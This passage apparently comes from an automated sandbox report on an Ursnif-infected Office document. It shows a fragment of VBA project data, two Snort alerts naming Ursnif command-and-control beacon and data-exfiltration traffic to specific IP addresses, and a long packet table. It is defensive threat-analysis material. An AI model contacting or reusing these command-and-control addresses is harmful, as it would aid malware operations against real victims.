                    Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . r ^ . . . . J . < . . . . . r s t d o l e > . . . s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . E N o r m a . l . E N . C r . m . . a . F . . . . . . . . * \\ C . . . . . . r .
                    Data Raw:01 a7 b4 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 d3 95 72 5e ce 1c 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 20 6f 6c 65 3e 00 01 19 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30

                    Network Behavior

                    Snort IDS Alerts

                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                    03/20/19-16:39:00.572242 | TCP | 2021813 | ET TROJAN Ursnif Variant CnC Beacon | 49206 | 80 | 192.168.1.83 | 37.152.176.90
                    03/20/19-16:39:11.897364 | TCP | 2021830 | ET TROJAN Ursnif Variant CnC Data Exfil | 49207 | 80 | 192.168.1.83 | 46.139.176.151

                    Network Port Distribution

                    TCP Packets

                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Mar 20, 2019 16:37:49.634068012 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.666841030 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.666996956 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.667716980 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.699666023 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.700239897 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.700280905 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.700310946 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.700342894 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.700371027 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.700388908 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.700398922 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.700427055 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.700454950 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.700480938 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.700542927 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.700634003 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.709187984 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.732690096 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.732732058 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.732758999 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.732793093 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.733881950 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.733912945 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.733942032 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.733971119 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.733997107 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.734024048 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.734061956 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.734100103 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.734127045 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.734153986 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.734179974 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.734205961 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.734231949 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.734257936 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.734322071 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.734348059 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.736907959 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.740381002 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.769077063 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.769124031 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.769160986 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.769192934 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.769223928 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.769237041 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.769268036 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.769292116 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.769305944 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.769332886 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.769359112 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.769368887 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.769386053 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.769412994 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.769440889 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.769468069 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.769495964 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.769500971 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.769525051 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.769548893 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.769575119 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.769593954 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.769602060 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.772614956 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.772685051 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.772727013 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.772756100 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.772779942 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.772799015 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.772838116 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.772861004 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.772901058 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.772927999 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.772943020 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.772979021 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.773000002 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.773021936 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.773034096 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.773045063 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.773067951 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.773088932 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.773113966 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.773135900 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.773150921 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.773156881 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.773179054 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.773200989 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.773224115 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.773260117 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.775572062 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.801768064 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.801811934 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.801975012 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.816412926 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.848565102 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.848604918 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.848620892 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.848634958 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.848649979 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.848664999 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.848681927 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.848700047 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.848715067 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.848731995 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.848747969 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.848803997 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.848822117 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.848846912 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.848889112 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.848906994 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.848925114 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.848942041 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.848961115 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.848978043 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.848993063 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849010944 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849026918 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849044085 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849047899 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.849111080 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849129915 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849145889 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849162102 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849178076 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849194050 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849198103 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.849211931 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849229097 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849252939 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849272966 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849288940 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849304914 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849320889 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849324942 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.849338055 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849354029 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849370003 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849397898 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849431992 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849431992 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.849450111 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849466085 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849482059 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849498034 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849514008 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849529982 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849567890 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.849570036 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849587917 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849605083 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849621058 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849637985 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849654913 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849670887 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.849688053 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.850142002 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.851293087 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.881473064 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.881520987 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.881551981 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.881560087 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.881582022 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.881778955 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.881814003 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.881840944 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.881865978 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.881884098 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.881943941 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.883511066 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.883548021 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.883599043 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.883613110 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.883640051 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.883663893 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.883701086 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.883723974 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.883742094 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.883766890 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.883826971 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.883842945 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.883852005 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.883893013 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.883940935 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.883965015 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.883972883 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.883999109 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884021997 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884066105 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884073973 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.884170055 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884196997 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884219885 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884251118 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.884263992 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884300947 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884324074 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884346962 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884370089 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884392977 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884414911 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884413958 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.884438992 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884463072 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884485960 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884507895 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884516954 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.884531021 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884555101 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884577990 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884599924 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884623051 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884633064 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.884646893 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884670019 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884691954 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884715080 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884737968 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884759903 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884762049 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.884782076 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884804964 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884828091 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.884856939 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.885492086 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.887725115 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.914220095 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.914262056 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.914285898 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.914308071 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.914330959 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.914354086 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.914542913 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.917474031 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.917501926 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.917521000 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.917541981 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.917560101 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.917578936 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.917860985 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.919884920 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.919914961 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.919936895 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.919948101 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.919992924 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920016050 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920046091 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920068026 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920079947 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.920125961 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920183897 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920207024 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920228004 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920252085 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.920258045 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920286894 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920312881 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
